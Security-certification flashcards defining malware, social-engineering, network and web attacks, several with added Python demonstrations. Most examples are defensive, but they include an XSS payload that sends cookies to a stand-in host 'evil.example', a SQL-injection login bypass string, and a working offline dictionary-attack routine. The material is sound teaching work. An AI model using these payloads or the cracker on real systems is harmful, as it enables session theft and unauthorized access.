Domain 1.0: Attacks, Threats, and Vulnerabilities Flashcards

1
Q

Virus

A

Malicious program that attaches itself to a host file or program, infects the system, and spreads copies of itself when the host is executed.

2
Q

Worms

A

Similar to a virus, but self-replicating: it spreads across the network on its own and does not require a host program or user action to replicate.

3
Q

Trojan

A

Malicious code disguised inside an apparently useful application, so the user installs it voluntarily.

4
Q

Logic bombs

A

Malicious code that stays dormant until a particular condition is met (a date, a user action, an account being deleted) and then triggers.

5
Q

Rootkits

A

Malware installed and hidden on a computer to keep covert, privileged access to the compromised system; it conceals its own files and processes, so the system often cannot detect it from within.

6
Q

Ransomware

A

Crypto-malware that encrypts the victim's files or disk and demands a ransom payment in exchange for the decryption key that releases the data.

7
Q

Spyware

A

Monitors browser and OS activity, logs keystrokes, and may degrade computer performance.

8
Q

What can cause a computer to run slowly and generate pop-up advertisements?

A

Spyware and adware

9
Q

Armored virus

A

Armored viruses use special tricks to make the tracing, disassembling, and understanding of their code more difficult.

10
Q

Phishing

A

Social engineering attack, carried out mainly through email, that is sent to a large audience in the hope that some recipients respond.

11
Q

Spear Phishing

A

Social engineering attack via email that targets a specific individual or group of individuals, usually with details gathered about them in advance.

12
Q

Whaling

A

Same as spear phishing, but aimed at high-value targets such as a CEO or other executive.

13
Q

Vishing

A

Voice phishing. Often uses spoofed caller ID to appear as a trusted organization and tries to get the individual to reveal account details over the phone.

14
Q

Pharming

A

Based on "farming" and "phishing". It does not require the user to be tricked into clicking a link; instead, it redirects victims to a bogus website even when they enter the intended address correctly, typically by poisoning DNS or the local hosts file.

15
Q

DoS and DDoS

A

DoS: Denial of Service. DDoS: Distributed Denial of Service, the same disruption launched from many sources at once (typically a botnet).

They disrupt normal network service. One example is the Smurf attack: the attacker sends ICMP echo requests to a network's broadcast address with the victim's address spoofed as the source, so every host on that network floods the victim with echo replies.

16
Q

Spoofing

A

Making data (an IP address, a MAC address, an email sender, a caller ID) appear to come from a trusted or legitimate origin.

17
Q

On-path attack

A

A third system intercepts traffic between two systems by impersonating each of them to the other (formerly called a man-in-the-middle attack); it can read or modify everything that passes through.

18
Q

Replay attacks

A

Capturing legitimate traffic (for example an authentication exchange) and retransmitting it later to obtain the same access without knowing the secret behind it.
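An added example for this card (not part of the original deck): a request authenticated with an HMAC is captured and resent. The naive server verifies only the MAC, so the replay is accepted; the second server also binds a random nonce and a timestamp into the MAC, rejects timestamps outside a short window, and remembers nonces it has already seen. The shared key, the message format and the window size are assumptions made for the example.

```python
import hashlib
import hmac
import os
import time
from typing import Optional

# Constructed shared secret between client and server (assumption for this example).
SHARED_KEY = b"example-shared-secret"


def sign(message: bytes, nonce: bytes, ts: int) -> str:
    """MAC over nonce, timestamp and message so none of them can be altered in transit."""
    mac = hmac.new(SHARED_KEY, nonce + ts.to_bytes(8, "big") + message, hashlib.sha256)
    return mac.hexdigest()


def make_request(message: bytes, now: Optional[int] = None) -> dict:
    """Client side: a fresh random nonce and the current timestamp on every request."""
    ts = now if now is not None else int(time.time())
    nonce = os.urandom(16)
    return {"msg": message, "nonce": nonce, "ts": ts, "tag": sign(message, nonce, ts)}


class NaiveServer:
    """Checks only that the MAC verifies, so a captured request replays forever."""

    def accept(self, req: dict) -> bool:
        return hmac.compare_digest(req["tag"], sign(req["msg"], req["nonce"], req["ts"]))


class ReplaySafeServer:
    """Also rejects stale timestamps and any nonce already seen inside the window."""

    def __init__(self, window_seconds: int = 30):
        self.window = window_seconds
        self.seen = {}  # nonce -> timestamp of first acceptance

    def accept(self, req: dict, now: Optional[int] = None) -> bool:
        now = now if now is not None else int(time.time())
        if not hmac.compare_digest(req["tag"], sign(req["msg"], req["nonce"], req["ts"])):
            return False  # forged or modified
        if abs(now - req["ts"]) > self.window:
            return False  # too old: a replay from outside the window (or bad clock skew)
        if req["nonce"] in self.seen:
            return False  # exact replay inside the window
        # Drop expired nonces so the cache stays bounded, then record this one.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        self.seen[req["nonce"]] = req["ts"]
        return True


def demo() -> tuple:
    """Returns (naive first delivery, naive replay, safe first delivery, safe replay)."""
    captured = make_request(b"transfer 100 to attacker", now=1_000_000)
    naive, safe = NaiveServer(), ReplaySafeServer()
    return (
        naive.accept(captured),
        naive.accept(captured),
        safe.accept(captured, now=1_000_001),
        safe.accept(captured, now=1_000_002),
    )
```

`demo()` returns `(True, True, True, False)`: the naive server accepts the captured request twice, the replay-safe server accepts it once. The timestamp check is what keeps the nonce cache small; without it the server would have to remember every nonce forever.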

19
Q

Zero-day vulnerability

A

A vulnerability not yet known to the vendor or the public, so no patch exists for it and antimalware signatures do not yet detect exploits against it.

20
Q

What includes repeated guessing of logons and passwords?

A

Password guessing, brute-force, and dictionary attacks (online against a login prompt, or offline against captured password hashes).

21
Q

Dictionary attacks

A

A dictionary attack is a method of breaking into a password-protected computer, network, or other IT resource by systematically trying every word in a word list (the "dictionary") as the password.
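An added example for cards 20 and 21 (not part of the original deck): an offline dictionary attack against a constructed credential store. Each record holds a random salt, an iteration count and a PBKDF2-HMAC-SHA256 hash; the attacker hashes every word in the list with each record's salt and compares. The word list, the two accounts and the iteration counts are constructed for the example.

```python
import hashlib
import os
import time

# Constructed word list; a real attack uses leaked-password lists with millions of entries.
WORDLIST = ["letmein", "qwerty", "password", "password123", "Summer2024", "correct horse"]


def pbkdf2_hash(password: str, salt: bytes, iterations: int) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)


def make_store(users: dict, iterations: int) -> dict:
    """Builds a constructed credential store: per-user random salt, iteration count and hash."""
    store = {}
    for user, password in users.items():
        salt = os.urandom(16)  # unique salt: the same password hashes differently per user
        store[user] = {"salt": salt, "iter": iterations, "hash": pbkdf2_hash(password, salt, iterations)}
    return store


def dictionary_attack(store: dict, wordlist) -> dict:
    """Offline attack: hash every candidate with each record's salt and compare to the stored hash."""
    recovered = {}
    for user, rec in store.items():
        for candidate in wordlist:
            if pbkdf2_hash(candidate, rec["salt"], rec["iter"]) == rec["hash"]:
                recovered[user] = candidate
                break
    return recovered


def demo() -> dict:
    # alice chose a word-list password; bob's random passphrase is not in any list.
    users = {"alice": "password123", "bob": "xK9#vQ2!mL7z-tree"}
    return dictionary_attack(make_store(users, iterations=1), WORDLIST)


def attack_seconds(iterations: int) -> float:
    """Cost of the same attack as the hash's work factor rises (the defender's lever)."""
    store = make_store({"alice": "password123"}, iterations)
    start = time.perf_counter()
    dictionary_attack(store, WORDLIST)
    return time.perf_counter() - start
```

`demo()` recovers only alice's password. Comparing `attack_seconds(1)` with `attack_seconds(200_000)` shows why a slow, salted password hash matters: the salt forces the attacker to redo the work per user, and the iteration count multiplies the cost of every guess.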

22
Q

DNS poisoning

A

Redirects traffic by inserting a false IP record for a domain into a DNS server's or resolver's cache, so clients that ask for the name are sent to the attacker's address.

23
Q

ARP poisoning

A

Layer 2 attack that sends forged ARP replies so that a device's ARP cache maps an IP address (often the gateway's) to the attacker's MAC address, letting the attacker intercept or modify that device's traffic.
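An added example for this card (not part of the original deck): the detection side of ARP poisoning, in the style of arpwatch. It reads ARP reply observations and raises an alert when an IP address changes MAC, and when one MAC address starts answering for the gateway as well as other hosts. The log lines are constructed for the example and only loosely follow tcpdump's ARP output format.

```python
import re
from collections import defaultdict

# Constructed ARP reply observations (not a real capture); the gateway is 192.168.1.1.
ARP_LOG = """\
10:00:01 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55
10:00:02 ARP, Reply 192.168.1.20 is-at aa:bb:cc:dd:ee:01
10:00:03 ARP, Reply 192.168.1.21 is-at aa:bb:cc:dd:ee:02
10:00:09 ARP, Reply 192.168.1.1 is-at aa:bb:cc:dd:ee:99
10:00:10 ARP, Reply 192.168.1.20 is-at aa:bb:cc:dd:ee:99
10:00:15 ARP, Reply 192.168.1.1 is-at aa:bb:cc:dd:ee:99
"""

LINE = re.compile(r"^(\S+) ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9A-Fa-f:]{17})$")


def parse(log: str):
    """Yields (timestamp, ip, mac) for each ARP reply line; other lines are ignored."""
    for line in log.splitlines():
        m = LINE.match(line.strip())
        if m:
            yield m.group(1), m.group(2), m.group(3).lower()


def detect_arp_poisoning(log: str, gateway_ip: str) -> list:
    """Two checks: an IP changing its MAC, and one MAC claiming the gateway plus other hosts."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in parse(log):
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append((ts, "mac-change", ip, previous, mac))
        ip_to_mac[ip] = mac

        before = len(mac_to_ips[mac])
        mac_to_ips[mac].add(ip)
        grew = len(mac_to_ips[mac]) > before  # alert once per new claim, not on every repeat
        if grew and len(mac_to_ips[mac]) > 1 and gateway_ip in mac_to_ips[mac]:
            alerts.append((ts, "gateway-shared-mac", mac, sorted(mac_to_ips[mac])))
    return alerts


def demo() -> list:
    return detect_arp_poisoning(ARP_LOG, gateway_ip="192.168.1.1")
```

`demo()` returns three alerts: the gateway's MAC changing at 10:00:09, host .20's MAC changing at 10:00:10, and the same MAC (`aa:bb:cc:dd:ee:99`) now answering for both, which is the signature of an attacker poisoning both ends of a conversation. A legitimate NIC replacement produces only a single mac-change alert.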

24
Q

What does XSRF stand for? What is it?

A

Cross-Site Request Forgery

An attack in which an end user's browser, while authenticated to a web application, is made to submit requests the user did not intend (for example via a crafted link or a hidden form on another site). The application accepts them because the browser attaches the session cookie automatically.

25
Q

What does XSS stand and what is it?

A

Cross-Site Scripting: a vulnerability that lets an attacker inject script into pages served to other users; the script runs in the victim's browser and can be used to steal the session cookie and hijack the user's session.
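An added example for this card (not part of the original deck): a search page that reflects the query into HTML, beside the output-encoded version, and a second pair showing that escaping `<` and `>` alone is not enough inside an attribute value. The payloads are constructed attacker input; the page fragments and the cookie header are assumptions made for the example.

```python
import html
import re

# Constructed payloads (example attacker input, not from a real incident).
SCRIPT_PAYLOAD = "<script>new Image().src='https://evil.example/?c='+document.cookie</script>"
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def results_vulnerable(query: str) -> str:
    """Reflects the query straight into HTML, so the payload runs in every visitor's browser."""
    return f"<h1>Results for {query}</h1>"


def results_fixed(query: str) -> str:
    """Encodes for the HTML text context: the browser shows the payload as literal text."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def prefill_vulnerable(value: str) -> str:
    """Inside an attribute, an unescaped quote breaks out and adds an event handler."""
    return f'<input name="q" value="{html.escape(value, quote=False)}">'


def prefill_fixed(value: str) -> str:
    """quote=True also encodes " and ', which is the minimum for an attribute context."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
EVENT_HANDLER = re.compile(r'\son\w+="', re.IGNORECASE)


def renders_script(markup: str) -> bool:
    return SCRIPT_TAG.search(markup) is not None


def has_event_handler_attr(markup: str) -> bool:
    return EVENT_HANDLER.search(markup) is not None


def session_cookie_header(session_id: str) -> str:
    """Defence in depth: HttpOnly keeps the cookie out of document.cookie even if an XSS lands."""
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax"
```

The fix is context-specific encoding at output time, not stripping "bad characters" on input: the same value needs different encoding in HTML text, in an attribute, in a URL and inside JavaScript, which is why templating engines that auto-escape per context are preferred to hand-written `f`-strings.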

26
Q

Injection Attacks

A

Attacks such as SQL, LDAP, DLL, and XML injection. They insert code or malicious input where a program expects plain data, so that the input is interpreted as commands and forces unauthorized activity or access.
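An added example for this card (not part of the original deck), using SQL injection as the representative case: a login query built by string concatenation, beside the parameterized version, plus an allow-list for a column name used in `ORDER BY`, which cannot be bound as a parameter. The in-memory SQLite database, its users and the injected string are constructed for the example; passwords are stored in plaintext only to keep the injection demonstration short.

```python
import sqlite3


def setup() -> sqlite3.Connection:
    """Constructed in-memory database; real systems store password hashes, not plaintext."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("alice", "s3cret", "user"), ("admin", "hunter2", "admin")])
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str):
    """String concatenation lets the input rewrite the query's logic."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return con.execute(sql).fetchone()


def login_parameterized(con: sqlite3.Connection, username: str, password: str):
    """Placeholders keep the input as data: the query structure cannot change."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone()


ALLOWED_SORT_COLUMNS = {"username", "role"}


def list_users(con: sqlite3.Connection, sort_by: str) -> list:
    """Identifiers cannot be parameters, so they are checked against an allow list instead."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    return [row[0] for row in con.execute(f"SELECT username FROM users ORDER BY {sort_by}")]


def demo() -> tuple:
    con = setup()
    injected = "admin' --"  # the comment marker removes the password check from the query
    return (
        login_vulnerable(con, injected, "anything"),
        login_parameterized(con, injected, "anything"),
        login_parameterized(con, "alice", "s3cret"),
    )
```

`demo()` returns `(('admin', 'admin'), None, ('alice', 'user'))`: the concatenated query logs the attacker in as admin with no password, while the parameterized query looks for a user literally named `admin' --` and finds nothing. The same two rules (bind data as parameters, allow-list anything that must be part of the statement) apply to LDAP filters and XPath/XML queries.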

27
Q

Rogue access point

A

Unauthorized wireless access point

28
Q

What kind of attack can a rogue access point provide to attackers?

A

An on-path attack: clients that associate with the rogue access point send all their traffic through it. A rogue access point that imitates a legitimate network's SSID is referred to as an evil twin.

29
Q

Bluejacking

A

Sending unsolicited messages to a nearby Bluetooth device; the messages can be crafted to look like system prompts and trick the user into accepting a connection with the attacker's device.

30
Q

Bluesnarfing

A

Unauthorized access to data (contacts, messages, calendar) on a Bluetooth device; once the attacker has a connection, the user's data becomes available for unauthorized access, modification, and deletion.

31
Q

What is the danger of unencrypted network traffic?

A

It can be captured with a packet sniffer and decoded from its raw form into readable form, exposing credentials and data in transit.

32
Q

Threat actor attributes include the actor’s relationship to the following:

A

The organization (internal or external actor), motive, intent, and capability (resources, funding, and sophistication).

33
Q

What are threat actor types?

A

Script kiddies, insiders, hacktivists, organized crime, competitors and nation-states.

34
Q

OSINT

A

Open Source Intelligence: information collected from publicly available sources such as publications, geospatial data, and many online resources.

35
Q

Black-box test

A

The assessor has no information or knowledge about the inner workings of the system.

36
Q

Four primary phases of a penetration test

A

Planning, discovery, attack, and reporting.

37
Q

White-box techniques

A

Often tests whether programming constructs are placed correctly and carry out the required actions. The assessor has knowledge of the inner workings of the system or of the source code.

38
Q

Gray box testing

A

Combination of white-box and black-box techniques. The tester has some understanding or limited knowledge of the inner workings.

39
Q

What occurs during the attack phase of a penetration test?

A

Initial exploitation, escalation of privilege, pivot and persistence.

40
Q

Vulnerability scan

A

Identifies vulnerabilities, misconfigurations, and missing security controls.

41
Q

Credentialed vulnerability scan reduces what issue?

A

False positives. Logging in to the host lets the scanner read installed package versions and configuration directly instead of inferring them from network responses.

42
Q

What is a race condition?

A

A race condition occurs when two or more threads can access shared data and try to change it at the same time, so the outcome depends on which one runs first.

It can result in system malfunction and unexpected results. The resulting errors can cause crashes and may allow attackers to escalate their privileges, for example by changing a resource between the time a program checks it and the time it uses it (time-of-check to time-of-use, TOCTOU).

43
Q

What problem can default accounts and password pose?

A

They can provide a simple means for an attacker to gain access.

44
Q

What attacks can proper input handling prevent?

A

It rejects malformed or hostile input (injection strings, oversized data, unexpected characters) that could alter data flow and allow an attacker to gain control of a system or remotely execute commands.

45
Q

What will happen if we turn off SSID broadcast?

A

It hides the network name from casual view, but does not effectively protect a wireless network from attack: the SSID is still sent in probe and association frames, so any sniffer recovers it.

46
Q

What is a false positive?

A

Typical or expected behavior is identified as irregular or malicious.

47
Q

What is false negative?

A

An alert that should have been generated did not occur at all.

48
Q

SIEM

A

Security Information and Event Management: a tool that collects, correlates, and displays data feeds (logs, alerts, flow records) to support response activities.
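An added example for this card (not part of the original deck): the kind of correlation rule a SIEM runs over collected logs, here a brute-force rule that fires when one source address reaches a failure threshold inside a sliding window and escalates if that source then logs in successfully. The log lines are constructed in an sshd-like format and are not from a real system; the threshold and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth log lines (sshd-like format, not from a real host).
AUTH_LOG = """\
2024-05-01T10:00:01 sshd[1] Failed password for invalid user admin from 203.0.113.9 port 50001
2024-05-01T10:00:03 sshd[1] Failed password for root from 203.0.113.9 port 50002
2024-05-01T10:00:05 sshd[1] Failed password for root from 203.0.113.9 port 50003
2024-05-01T10:00:07 sshd[1] Accepted password for alice from 198.51.100.4 port 60000
2024-05-01T10:00:09 sshd[1] Failed password for root from 203.0.113.9 port 50004
2024-05-01T10:00:11 sshd[1] Failed password for root from 203.0.113.9 port 50005
2024-05-01T10:00:13 sshd[1] Accepted password for root from 203.0.113.9 port 50006
2024-05-01T10:30:00 sshd[1] Failed password for bob from 198.51.100.4 port 60001
"""

LINE = re.compile(
    r"^(\S+) sshd\[\d+\] (Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+$")


def parse(log: str):
    """Yields (timestamp, outcome, user, source) for each recognised line."""
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), m.group(4)


def correlate(log: str, threshold: int = 5, window_seconds: int = 60) -> list:
    """Flags a source at `threshold` failures within the window; escalates if it then succeeds."""
    failures = defaultdict(deque)  # source -> timestamps of failures still inside the window
    flagged = set()
    alerts = []
    for ts, outcome, user, src in parse(log):
        recent = failures[src]
        while recent and (ts - recent[0]).total_seconds() > window_seconds:
            recent.popleft()  # slide the window forward
        if outcome == "Failed":
            recent.append(ts)
            if len(recent) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("brute-force", src, ts.isoformat()))
        elif src in flagged:
            alerts.append(("brute-force-success", src, user, ts.isoformat()))
    return alerts


def demo() -> list:
    return correlate(AUTH_LOG)
```

`demo()` returns two alerts: `203.0.113.9` reaching five failures at 10:00:11, then its successful `root` login two seconds later, which is the one an analyst must act on first. The single failure from `198.51.100.4` half an hour later never reaches the threshold; tuning `threshold` and `window_seconds` is how the false positive rate of such a rule is managed.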

49
Q

SOAR

A

Security Orchestration, Automation and Response - it combines security orchestration & automation with threat intelligence platforms and incident response platforms.

50
Q

Threat Hunting

A

Proactive approach to finding an attacker before alerts are triggered.

51
Q

Rogue access point

A

An unauthorized wireless access point set up on the network, whether by an attacker or by an employee bypassing policy.

52
Q

What is bluejacking?

A

Attackers send unsolicited Bluetooth messages that appear to come from the device itself, leading users to follow the prompts and establish an open Bluetooth connection to the attacker's device.

53
Q

What is bluesnarfing?

A

Following a successful unauthorized Bluetooth connection, the user's data becomes open to unauthorized access, modification, and deletion.

54
Q

What is the danger of unencrypted traffic across the network?

A

An attacker can use a packet sniffer to capture it and decode it from its raw form into readable text.

55
Q

Threat actor attributes include the actor's relationship to what?

A

The organization (internal or external), motive, intent, and capability.

56
Q

What are the types of threat actor?

A

Script kiddies, insiders, hacktivists, organized crime, competitors, and nation-states.